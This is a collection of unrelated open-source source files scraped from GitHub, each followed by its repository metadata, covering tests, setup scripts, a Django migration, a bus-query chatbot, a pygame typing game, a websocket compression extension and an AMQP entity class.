model = L.Classifier(
TupleDataParent(communicator, d, rank_next))
elif communicator.rank % 2 == 1:
model = TupleDataChild(communicator, d, rank_prev)
assert model is not None
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
if communicator.rank % 2 == 0:
err = model(X[i:i + 1], Y[i:i + 1])
elif communicator.rank % 2 == 1:
err = model()
assert err is not None
err.backward()
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_tuple_data_model_cpu(param):
check_tuple_data_model(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_tuple_data_model_gpu(param):
check_tuple_data_model(True, param)
|
{
"content_hash": "42be6c958e0a2312fc67d11985ba3853",
"timestamp": "",
"source": "github",
"line_count": 461,
"max_line_length": 79,
"avg_line_length": 32.62689804772234,
"alnum_prop": 0.6103982447975533,
"repo_name": "wkentaro/chainer",
"id": "6d8d91758a8f2447408cdf3cfcc2625783a187bf",
"size": "15041",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/chainermn_tests/links_tests/test_multi_node_chain_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3368"
},
{
"name": "C",
"bytes": "1231"
},
{
"name": "C++",
"bytes": "1662966"
},
{
"name": "CMake",
"bytes": "50912"
},
{
"name": "Cuda",
"bytes": "178765"
},
{
"name": "Dockerfile",
"bytes": "3316"
},
{
"name": "PowerShell",
"bytes": "7197"
},
{
"name": "Python",
"bytes": "6041757"
},
{
"name": "Shell",
"bytes": "41813"
}
],
"symlink_target": ""
}
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import print_function, unicode_literals
import flexmock
import pytest
from atomic_reactor.core import DockerTasker
from atomic_reactor.inner import DockerBuildWorkflow
from atomic_reactor.plugin import PostBuildPluginsRunner
from atomic_reactor.plugins.exit_remove_built_image import (GarbageCollectionPlugin,
defer_removal)
from atomic_reactor.plugins.post_tag_and_push import TagAndPushPlugin
from atomic_reactor.util import ImageName
from tests.constants import (LOCALHOST_REGISTRY,
TEST_IMAGE,
IMPORTED_IMAGE_ID,
INPUT_IMAGE,
MOCK)
if MOCK:
from tests.docker_mock import mock_docker
class X(object):
pass
def mock_environment(base_image=None):
if MOCK:
mock_docker()
tasker = DockerTasker()
workflow = DockerBuildWorkflow({"provider": "git", "uri": "asd"},
TEST_IMAGE)
workflow.postbuild_results[TagAndPushPlugin.key] = True
workflow.tag_conf.add_primary_image(TEST_IMAGE)
workflow.push_conf.add_docker_registry(LOCALHOST_REGISTRY, insecure=True)
setattr(workflow, 'builder', X())
setattr(workflow.builder, 'image_id', INPUT_IMAGE)
setattr(workflow.builder, 'source', X())
setattr(workflow.builder.source, 'dockerfile_path', None)
setattr(workflow.builder.source, 'path', None)
base_image = ImageName.parse(IMPORTED_IMAGE_ID)
setattr(workflow.builder, 'base_image', base_image)
workflow.pulled_base_images.add(IMPORTED_IMAGE_ID)
return tasker, workflow
class TestGarbageCollectionPlugin(object):
@pytest.mark.parametrize(('remove_base', 'deferred', 'expected'), [
(False, [], set([INPUT_IMAGE])),
(False, ['defer'], set([INPUT_IMAGE, 'defer'])),
(True, [], set([IMPORTED_IMAGE_ID, INPUT_IMAGE])),
(True, ['defer'], set([IMPORTED_IMAGE_ID, INPUT_IMAGE, 'defer'])),
])
def test_remove_built_image_plugin(self, remove_base, deferred, expected):
tasker, workflow = mock_environment()
runner = PostBuildPluginsRunner(
tasker,
workflow,
[{
'name': GarbageCollectionPlugin.key,
'args': {'remove_pulled_base_image': remove_base},
}]
)
removed_images = []
def spy_remove_image(image_id, force=None):
removed_images.append(image_id)
flexmock(tasker, remove_image=spy_remove_image)
for image in deferred:
defer_removal(workflow, image)
runner.run()
image_set = set(removed_images)
assert len(image_set) == len(removed_images)
assert image_set == expected
|
{
"content_hash": "8d2cd58810a8552fdca13dcd6059e8fa",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 84,
"avg_line_length": 35.04705882352941,
"alnum_prop": 0.6307485733467607,
"repo_name": "jarodwilson/atomic-reactor",
"id": "d7e8da413e2f82b2e631ceee893b1a40e6447bd9",
"size": "2979",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/plugins/test_remove_built_image.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1134730"
},
{
"name": "Shell",
"bytes": "3589"
}
],
"symlink_target": ""
}
|
from JumpScale import j
import time
descr = """
This jumpscript waits timeout sec (test)
"""
category = "test"
organization = "jumpscale"
author = "kristof@incubaid.com"
license = "bsd"
version = "1.0"
roles = []
def action(msg, waittime):
j.logger.log(msg, level=5, category="test.wait")
time.sleep(waittime)
return msg
|
{
"content_hash": "4b0765f755569665578c43744801f71a",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 52,
"avg_line_length": 17.736842105263158,
"alnum_prop": 0.6824925816023739,
"repo_name": "Jumpscale/jumpscale_core8",
"id": "b68b4f995d8796ef0bb1181e453f49faf4674cf8",
"size": "337",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/agentcontroller/jumpscripts/jumpscale/test_wait.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1113"
},
{
"name": "Cap'n Proto",
"bytes": "9033"
},
{
"name": "Lua",
"bytes": "12538"
},
{
"name": "Python",
"bytes": "4343122"
},
{
"name": "Shell",
"bytes": "7091"
}
],
"symlink_target": ""
}
|
from distutils.core import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
pytest.main(self.test_args)
setup(name='variational-dropout',
version='0.0.1',
description='Initial Variational Dropout replication.',
author='Gavin Gray',
author_email='g.d.b.gray@sms.ed.ac.uk',
packages=['varout'],
tests_require=['pytest'],
# install reqs pending
cmdclass={'test': PyTest},
)
|
{
"content_hash": "77797ef028469fedc77e1a6fe55afea1",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 61,
"avg_line_length": 29.545454545454547,
"alnum_prop": 0.6492307692307693,
"repo_name": "gngdb/variational-dropout",
"id": "e2b6028911d1d91defb35849e15dc744d87d865a",
"size": "673",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1628824"
},
{
"name": "Python",
"bytes": "39188"
},
{
"name": "Shell",
"bytes": "43"
},
{
"name": "TeX",
"bytes": "10519"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('cat_id', models.IntegerField(serialize=False, primary_key=True)),
('short_name', models.CharField(max_length=200)),
],
options={
},
bases=(models.Model,),
),
]
|
{
"content_hash": "bb39b95085edc1ad5910232855631c44",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 83,
"avg_line_length": 23.045454545454547,
"alnum_prop": 0.5305719921104537,
"repo_name": "speedaddict81/Eventsite",
"id": "5116b2e05d9e93bfcc27c3a45bdddbbe1777094b",
"size": "531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "events/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "707"
},
{
"name": "HTML",
"bytes": "3154"
},
{
"name": "JavaScript",
"bytes": "771"
},
{
"name": "Python",
"bytes": "11058"
}
],
"symlink_target": ""
}
|
from alembic.operations import Operations
from alembic import util
# create proxy functions for
# each method on the Operations class.
util.create_module_class_proxy(Operations, globals(), locals())
|
{
"content_hash": "d4641880ddaa392883ffe28ec0c2145b",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 63,
"avg_line_length": 33.333333333333336,
"alnum_prop": 0.8,
"repo_name": "shadowmint/py-test-watcher",
"id": "6934ccc8aa2050213169d69676830ab4f2d5cb51",
"size": "200",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/alembic-0.5.0/alembic/op.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "109878"
},
{
"name": "Python",
"bytes": "488664"
},
{
"name": "Shell",
"bytes": "544"
}
],
"symlink_target": ""
}
|
from flask import Flask, render_template
from flask_weixin import Weixin
from beijing_bus import BeijingBus
# 查询示例
QUERY_EXAMPLE = '查询示例: 从西坝河到将台路口西'
# 用户关注公众号时给他推送一条消息
ON_FOLLOW_MESSAGE = {
'title': '使用说明',
'description': '',
'picurl': 'http://doora.qiniudn.com/H9v9n.jpg',
'url': 'http://t.cn/Rz0J1V6',
}
app = Flask(__name__)
app.config.from_object('config')
weixin = Weixin(app)
app.add_url_rule('/weixin', view_func=weixin.view_func)
if app.config.get('SENTRY_DSN'):
from raven.contrib.flask import Sentry
sentry = Sentry(app)
@weixin.register('*')
def query(**kwargs):
username = kwargs.get('sender')
sender = kwargs.get('receiver')
message_type = kwargs.get('type')
def r(content):
return weixin.reply(
username, sender=sender, content=content
)
if message_type == 'event' and kwargs.get('event') == 'subscribe':
return weixin.reply(
username, type='news', sender=sender, articles=[ON_FOLLOW_MESSAGE]
)
content = kwargs.get('content')
if not content:
reply = '我好笨笨哦,还不懂你在说什么。\n%s' % QUERY_EXAMPLE
return r(reply)
if isinstance(content, unicode):
content = content.encode('utf-8')
stations = BeijingBus.extract_stations(content)
lines = BeijingBus.extract_lines(content)
if len(stations) < 2:
reply = '没有结果,可能还不支持这条线路呢~ \n%s' % QUERY_EXAMPLE
return r(reply)
from_station, to_station = stations[:2]
lines = match_stations_with_lines(from_station, to_station, lines)
if not lines:
reply = '没有结果,可能还不支持这条线路呢~ \n%s' % QUERY_EXAMPLE
return r(reply)
reply = get_realtime_message(lines, from_station)
return r(reply)
def match_stations_with_lines(from_station, to_station, lines=None):
def match(a, b, l):
'''检查l中包含a和b且a比b靠前'''
try:
return l.index(a) < l.index(b)
except ValueError:
return False
if not lines:
lines = BeijingBus.get_all_lines()
return [
line for line in lines if match(from_station, to_station, line.stations)
]
def get_realtime_message(lines, station):
realtime_datas = []
for line in lines:
for data in line.get_realtime_data(station):
if data.get('station_arriving_time'):
realtime_datas.append((line, data))
realtime_datas.sort(key=lambda d: d[1]['station_arriving_time'])
if not realtime_datas:
return '暂时还没有车要来呢 T T'
reply = ''
for i, (line, data) in enumerate(realtime_datas[:6]):
reply += '车辆%s:%s\n' % (i+1, line.short_name)
reply += '距离%s还有 %s米,' % (station.name, int(data['station_distance']))
reply += '预计%s到达\n\n' % data['station_arriving_time'].strftime('%H:%M')
return reply.strip()
@app.route('/list')
def list_supported_lines():
names = set([
line.short_name for line in BeijingBus.get_all_lines()
])
names = sorted([n.decode('utf-8') for n in names])
return render_template('list.html', line_names=names)
if __name__ == '__main__':
app.run(debug=True, port=8484)
|
{
"content_hash": "1457f9f5feededf2e4be1e3af2198c18",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 80,
"avg_line_length": 26.99137931034483,
"alnum_prop": 0.6183328010220377,
"repo_name": "wong2/beijing_bus",
"id": "ea91e54a42679b91041643bdc00fdc7c827bf912",
"size": "3389",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "weixin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "501"
},
{
"name": "Python",
"bytes": "14428"
}
],
"symlink_target": ""
}
|
import sys, pygame, time,random
from pygame.locals import *
def print_text(font, x, y, text, color=(255, 255, 255)):
imgText = font.render(text, True, color)
screen.blit(imgText, (x, y))
# main program brgains
pygame.init()
screen = pygame.display.set_mode((600, 500))
font1 = pygame.font.Font(None, 24)
font2 = pygame.font.Font(None, 200)
white = 255, 255, 255
yellow = 255, 255, 0
key_flag = False
correct_answer = 97
seconds = 11
score = 0
clock_start = 0
game_over = True
while True:
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
elif event.type == KEYDOWN:
key_flag = True
elif event.type == KEYUP:
key_flag = False
keys = pygame.key.get_pressed()
if keys[K_ESCAPE]:
sys.exit()
if keys[K_RETURN]:
if game_over:
game_over = False
score = 0
seconds = 11
clock_start = time.clock()
current = time.clock() - clock_start
speed = score * 6
if seconds-current < 0:
game_over = True
elif current <= 10:
if keys[correct_answer]:
correct_answer = random.randint(97, 122)
score += 1
screen.fill((0,100,0))
print_text(font1, 0, 0,'let\'s see how fast you can type!' )
print_text(font1, 0, 20, 'try to keep up fo 10 seconds...')
if key_flag:
print_text(font1, 500, 0, '<key>')
if not game_over:
print_text(font1, 0, 80, 'time:'+str(int(seconds-current)))
print_text(font1, 0, 100, 'speed: '+str(speed)+' letters/min')
if game_over:
print_text(font1,0, 160, 'press enter to start')
print_text(font2, 0, 240, chr(correct_answer-32), yellow)
pygame.display.update()
|
{
"content_hash": "8c3bd049b8a8c116c4e653d74c82ffd6",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 67,
"avg_line_length": 27.104477611940297,
"alnum_prop": 0.5638766519823789,
"repo_name": "sun1218/Pygames",
"id": "274fa11c218f3b511b9bc9e8d812991f7c6e6e79",
"size": "1816",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "game/type_speed.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "126530"
}
],
"symlink_target": ""
}
|
import grpc
from google.cloud.automl_v1beta1.proto import prediction_service_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2
class PredictionServiceStub(object):
"""AutoML Prediction API.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Predict = channel.unary_unary(
'/google.cloud.automl.v1beta1.PredictionService/Predict',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2.PredictRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2.PredictResponse.FromString,
)
class PredictionServiceServicer(object):
"""AutoML Prediction API.
"""
def Predict(self, request, context):
"""Perform a prediction.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_PredictionServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Predict': grpc.unary_unary_rpc_method_handler(
servicer.Predict,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2.PredictRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2.PredictResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.cloud.automl.v1beta1.PredictionService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
{
"content_hash": "a944c455e87ba49486f33d72f6e89685",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 147,
"avg_line_length": 37.46666666666667,
"alnum_prop": 0.7301304863582444,
"repo_name": "jonparrott/gcloud-python",
"id": "adfd74458e4e378bc76cfe13acce43d8970ce2cd",
"size": "1756",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "automl/google/cloud/automl_v1beta1/proto/prediction_service_pb2_grpc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "62009"
},
{
"name": "Python",
"bytes": "3459300"
},
{
"name": "Shell",
"bytes": "7548"
}
],
"symlink_target": ""
}
|
import frappe
from frappe.utils import escape_html, get_request_site_address, now, cstr
from urllib.parse import quote, urljoin
no_cache = 1
base_template_path = "www/rss.xml"
def get_context(context):
"""generate rss feed"""
host = get_request_site_address()
blog_list = frappe.db.sql("""\
select route as name, published_on, modified, title, content from `tabBlog Post`
where ifnull(published,0)=1
order by published_on desc limit 20""", as_dict=1)
for blog in blog_list:
blog_page = cstr(quote(blog.name.encode("utf-8")))
blog.link = urljoin(host, blog_page)
blog.content = escape_html(blog.content or "")
if blog_list:
modified = max((blog['modified'] for blog in blog_list))
else:
modified = now()
blog_settings = frappe.get_doc('Blog Settings', 'Blog Settings')
context = {
'title': blog_settings.blog_title or "Blog",
'description': blog_settings.blog_introduction or "",
'modified': modified,
'items': blog_list,
'link': host + '/blog'
}
# print context
return context
|
{
"content_hash": "7024d514b1a702a4d75138100836047c",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 82,
"avg_line_length": 26.23076923076923,
"alnum_prop": 0.6930596285434996,
"repo_name": "almeidapaulopt/frappe",
"id": "093cdf2d19b53a7680b9b2c77b13ed9b2dbf44cb",
"size": "1121",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "frappe/www/rss.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "67734"
},
{
"name": "HTML",
"bytes": "245760"
},
{
"name": "JavaScript",
"bytes": "2345089"
},
{
"name": "Less",
"bytes": "25489"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "3436599"
},
{
"name": "SCSS",
"bytes": "248606"
},
{
"name": "Shell",
"bytes": "3505"
},
{
"name": "Vue",
"bytes": "96912"
}
],
"symlink_target": ""
}
|
import zlib
from extension import Extension
from deflate_frame import DeflateFrame
class DeflateMessage(Extension):
"""
Implementation of the "permessage-deflate" extension, as defined by
http://tools.ietf.org/html/draft-ietf-hybi-permessage-compression-17.
Note: this implementetion is only eligible for server sockets, client
sockets must NOT use it.
"""
name = 'permessage-deflate'
rsv1 = True
defaults = {
'client_max_window_bits': zlib.MAX_WBITS,
'client_no_context_takeover': False,
'server_max_window_bits': zlib.MAX_WBITS,
'server_no_context_takeover': False
}
before_fragmentation = True
compression_threshold = 20 # minimal message payload size for compression
def negotiate(self, name, params):
default = self.defaults['client_max_window_bits']
if 'client_max_window_bits' in params:
mwb = params['client_max_window_bits']
if mwb is True:
if default != zlib.MAX_WBITS:
yield 'client_max_window_bits', default
else:
mwb = int(mwb)
assert 8 <= mwb <= zlib.MAX_WBITS
yield 'client_max_window_bits', min(mwb, default)
elif default != zlib.MAX_WBITS:
yield 'client_max_window_bits', default
if 'client_no_context_takeover' in params:
assert params['client_no_context_takeover'] is True
yield 'client_no_context_takeover', True
elif self.defaults['client_no_context_takeover']:
yield 'client_no_context_takeover', True
default = self.defaults['server_max_window_bits']
if 'server_max_window_bits' in params:
mwb = int(params['server_max_window_bits'])
assert 8 <= mwb <= zlib.MAX_WBITS
yield 'server_max_window_bits', min(mwb, default)
elif default != zlib.MAX_WBITS:
yield 'server_max_window_bits', default
if 'server_no_context_takeover' in params:
assert params['server_no_context_takeover'] is True
yield 'server_no_context_takeover', True
elif self.defaults['server_no_context_takeover']:
yield 'server_no_context_takeover', True
class Instance(DeflateFrame.Instance):
def init(self):
if not self.server_no_context_takeover:
self.defl = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION,
zlib.DEFLATED, -self.server_max_window_bits)
if not self.client_no_context_takeover:
self.dec = zlib.decompressobj(-self.client_max_window_bits)
def deflate(self, data):
if self.server_no_context_takeover:
self.defl = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION,
zlib.DEFLATED, -self.server_max_window_bits)
compressed = self.defl.compress(data)
compressed += self.defl.flush(zlib.Z_SYNC_FLUSH)
assert compressed[-4:] == '\x00\x00\xff\xff'
return compressed[:-4]
def inflate(self, data):
data = str(data + '\x00\x00\xff\xff')
if self.client_no_context_takeover:
self.dec = zlib.decompressobj(-self.client_max_window_bits)
return self.dec.decompress(data)
|
{
"content_hash": "01e2a8d398c61097ca556ab4dbf3bf50",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 78,
"avg_line_length": 37.561797752808985,
"alnum_prop": 0.6054442117858211,
"repo_name": "taddeus/wspy",
"id": "5cf0573987da1663c4d795fa40ea9834a2f01990",
"size": "3343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "deflate_message.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "997"
},
{
"name": "Python",
"bytes": "89995"
}
],
"symlink_target": ""
}
|
"""setup.py for Brax.
Install for development:
pip intall -e .
"""
from setuptools import find_packages
from setuptools import setup
setup(
name="brax",
version="0.0.15",
description=("A differentiable physics engine written in JAX."),
author="Brax Authors",
author_email="no-reply@google.com",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="http://github.com/google/brax",
license="Apache 2.0",
packages=find_packages(),
include_package_data=True,
scripts=["bin/learn"],
install_requires=[
"absl-py",
"dataclasses",
"dm_env",
"flax",
"gym",
"grpcio",
"jax",
"jaxlib",
"numpy",
"optax",
"Pillow",
"pytinyrenderer",
"tensorboardX",
"trimesh",
"typing-extensions",
# TODO: remove when
# https://github.com/google/flax/issues/2190 is fixed.
"PyYAML>=6.0",
],
extras_require={
"develop": ["pytest", "transforms3d"],
},
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
keywords="JAX reinforcement learning rigidbody physics",
data_files=[
("testdata", ["brax/tests/testdata/cylinder.stl"])
],
)
|
{
"content_hash": "7ac5195db1ceac1e58e11860996de26a",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 69,
"avg_line_length": 26.54237288135593,
"alnum_prop": 0.5798212005108557,
"repo_name": "google/brax",
"id": "9ea6e535f8696c7d09edeac49b65cc21d8aca6d2",
"size": "2148",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "27572"
},
{
"name": "Jupyter Notebook",
"bytes": "8554172"
},
{
"name": "Python",
"bytes": "1189091"
}
],
"symlink_target": ""
}
|
import sqlite3, os
from itunes import get_library_file, ITunes
from hplatform import get_db_path, get_default_path
def get_music_files(dir):
music_files = []
for root, dirs, files in os.walk(dir):
for file in files:
if is_music_file(file):
#trying to catch the special case in Ubuntu where $HOME/Network
#maps to every network share. You can still upload that dir if
#you select it explicitly, but it won't descend automatically.
if not(root == os.getenv('HOME') and file == 'Network'
and os.name == 'posix'):
music_files.append(os.path.join(root, file))
return music_files
def is_music_file(file):
return file.endswith('.mp3') or file.endswith('.m4a')
def unique_dirs(dirs):
unique_dirs = []
dirs.sort()
for dir in dirs:
child_dir = False
for pdir in unique_dirs:
if os.path.commonprefix([pdir, dir]) == pdir:
child_dir = True
break
if not child_dir:
unique_dirs.append(dir)
return unique_dirs
class DB(object):
def __init__(self, db_path):
self.db_path = db_path
self.trans_conn = None
self.versions = [self.version_1, self.version_2]
try:
conn = self.get_conn()
version = int(conn.execute('select value from settings where key=?',
('version',)).fetchone()[0])
except sqlite3.OperationalError:
conn.close()
os.remove(self.db_path)
version = 0
for upgrade_version in self.versions[version:]:
upgrade_version()
def get_conn(self):
if self.trans_conn:
return self.trans_conn
return sqlite3.connect(self.db_path)
def version_1(self):
conn = self.get_conn()
c = conn.cursor()
c.execute('create table settings (key text, value text)')
c.execute('create table upload_dirs (dir text)')
c.execute('''create table files
(filename text, puid text, uploaded int)''')
c.execute('create table files_skipped (filename text)')
c.execute('insert into settings (key, value) values (?, ?)',
('version', '1'))
if get_library_file:
upload_src = 'itunes'
else:
upload_src = 'folder'
c.execute('insert into settings (key, value) values (?, ?)',
('upload_src', upload_src))
c.execute('insert into upload_dirs values (?)', (get_default_path(),))
conn.commit()
def version_2(self):
conn = self.get_conn()
c = conn.cursor()
c.execute('create index files_filename on files (filename)')
c.execute("""update settings set value=? where key='version'""", (2,))
conn.commit()
def add_skipped(self, filename):
conn = self.get_conn()
conn.execute('insert into files_skipped values(?)', (filename,))
conn.commit()
def is_file_uploaded(self, filename):
c = self.get_conn()
return c.execute(
'''select filename from files where
filename=? and uploaded=? union
select filename from files_skipped where filename=?''',
(filename, 1, filename)).fetchone() != None
def total_uploaded_tracks(self):
c = self.get_conn()
return c.execute('select count(*) from files where uploaded=?',
(1,)).fetchone()[0]
def get_tracks(self):
if self.upload_src == 'itunes':
tracks = filter(is_music_file,
ITunes().get_all_track_filenames())
else:
tracks = []
for dir in unique_dirs(self.upload_dirs):
tracks.extend(get_music_files(dir))
if tracks == []:
return None
else:
return filter(lambda x: not self.is_file_uploaded(x), tracks)
def get_upload_src(self):
c = self.get_conn()
return c.execute('select value from settings where key=?',
('upload_src',)).fetchone()[0]
def set_upload_src(self, value):
conn = self.get_conn()
if value not in ['itunes', 'folder']:
raise Exception('Invalid upload src')
conn.execute('update settings set value=? where key=?',
(value,'upload_src'))
conn.commit()
upload_src = property(get_upload_src, set_upload_src)
def set_upload_dirs(self, values):
conn = self.get_conn()
data = [(val,) for val in values]
c = conn.cursor()
c.execute('delete from upload_dirs')
c.executemany('insert into upload_dirs values (?)', data)
conn.commit()
def get_upload_dirs(self):
c = self.get_conn()
values = c.execute('select dir from upload_dirs').fetchall()
return [val[0] for val in values]
upload_dirs = property(get_upload_dirs, set_upload_dirs)
def get_puid(self, filename):
c = self.get_conn()
res = c.execute('select puid from files where filename=?',
(filename,)).fetchone()
if res == None:
return None
else:
return res[0]
def file_exists(self, filename, conn):
return (conn.execute('select count(*) from files where filename=?',
(filename,)).fetchone()[0] > 0)
def set_puid(self, filename, puid):
conn = self.get_conn()
if self.file_exists(filename, conn):
conn.execute('update files set puid=? where filename=?',
(puid, filename))
else:
conn.execute('''insert into files (filename, puid, uploaded) values
(?, ?, ?)''', (filename, puid, 0))
conn.commit()
def set_uploaded(self, filename, puid=None):
conn = self.get_conn()
if self.file_exists(filename, conn):
conn.execute('update files set uploaded=? where filename=?',
(1, filename))
else:
conn.execute('''insert into files (filename, puid, uploaded) values
(?, ?, ?)''', (filename, puid, 1))
if not self.trans_conn:
conn.commit()
def start_trans(self):
self.trans_conn = self.get_conn()
def end_trans(self):
self.trans_conn.commit()
self.trans_conn = None
db = DB(get_db_path())
def use_new_db(path):
global db
db = DB(path)
|
{
"content_hash": "283e90e4714fd637b2bbf2758349b24c",
"timestamp": "",
"source": "github",
"line_count": 202,
"max_line_length": 72,
"avg_line_length": 27.178217821782177,
"alnum_prop": 0.654280510018215,
"repo_name": "JustinTulloss/harmonize.fm",
"id": "047fff0a77e0a8575c7861b44611ddf70767f401",
"size": "5490",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "uploader/db.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP",
"bytes": "93"
},
{
"name": "ActionScript",
"bytes": "11412"
},
{
"name": "C",
"bytes": "24324"
},
{
"name": "C++",
"bytes": "9745"
},
{
"name": "JavaScript",
"bytes": "5472452"
},
{
"name": "PHP",
"bytes": "14520"
},
{
"name": "Python",
"bytes": "1094604"
},
{
"name": "Ruby",
"bytes": "510"
},
{
"name": "Visual Basic",
"bytes": "1724"
}
],
"symlink_target": ""
}
|
"""
AMQP Managment Entity
"""
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import itertools, re
import sys
if sys.version_info[0] > 2:
# Python 3 does not have a unicode() builtin method,
# luckily all strings are unicode to start with
def unicode(s):
return s
def dict_iteritems(d):
return iter(d.items())
else:
def dict_iteritems(d):
return d.iteritems()
def clean_dict(items, **kwargs):
"""
@param items: A mapping or iterable of pairs.
@return: dict containing items + kwargs without any None values. All keys are unicode.
"""
if isinstance(items, dict): items = dict_iteritems(items)
return dict((unicode(k), v) for k, v in itertools.chain(items,
dict_iteritems(kwargs))
if v is not None)
class EntityBase(object):
"""
A collection of named attributes.
Attribute access:
- via index operator: entity['foo']
- as python attributes: entity.foo (only if attribute name is a legal python identitfier
after replacing '-' with '_')
@ivar attributes: Map of attribute values for this entity.
NOTE: EntityBase does not itself implement the python map protocol because map
methods (in particular 'update') can clash with AMQP methods and attributes.
"""
def __init__(self, attributes=None, **kwargs):
self.__dict__['attributes'] = {}
if attributes:
for k, v in dict_iteritems(attributes):
self.attributes[k] = v
self.__dict__[self._pyname(k)] = v
for k, v in dict_iteritems(kwargs):
self._set(k, v)
def __getitem__(self, name):
return self.attributes[name]
def __getattr__(self, name):
if name in self.attributes:
return self.attributes[name]
raise AttributeError
def __contains__(self, name):
return name in self.attributes
@staticmethod
def _pyname(name): return name.replace('-', '_')
def _set(self, name, value):
"""Subclasses can override _set to do validation on each change"""
self.attributes[name] = value
self.__dict__[self._pyname(name)] = value
# Access using []
def __setitem__(self, name, value): self._set(name, value)
def __delitem__(self, name):
del self.attributes[name]
del self.__dict__[self._pyname(name)]
# Access as python attribute.
def __setattr__(self, name, value): self._set(name, value)
def __delattr__(self, name):
self.__delitem__(name)
def __repr__(self): return "EntityBase(%r)" % self.attributes
# attributes name, identity and type are special snowflake
# attributes that we print before all the not so special
# attributes. Assign each a priority for the sort
_SPECIAL = {u"name": 0, u"identity": 1, u"type": 2}
def __str__(self):
# Sort so the _SPECIAL attributes are printed first, 3 ==
# lower priority than special
keys = sorted(self.attributes.keys(),
key=lambda k: self._SPECIAL.get(k, 3))
return "Entity(%s)" % ", ".join("%s=%s" % (k, self.attributes[k]) for k in keys)
def update(entity, values):
"""Update entity from values
@param entity: an Entity
@param values: a map of values
"""
for k, v in dict_iteritems(values): entity[k] = v
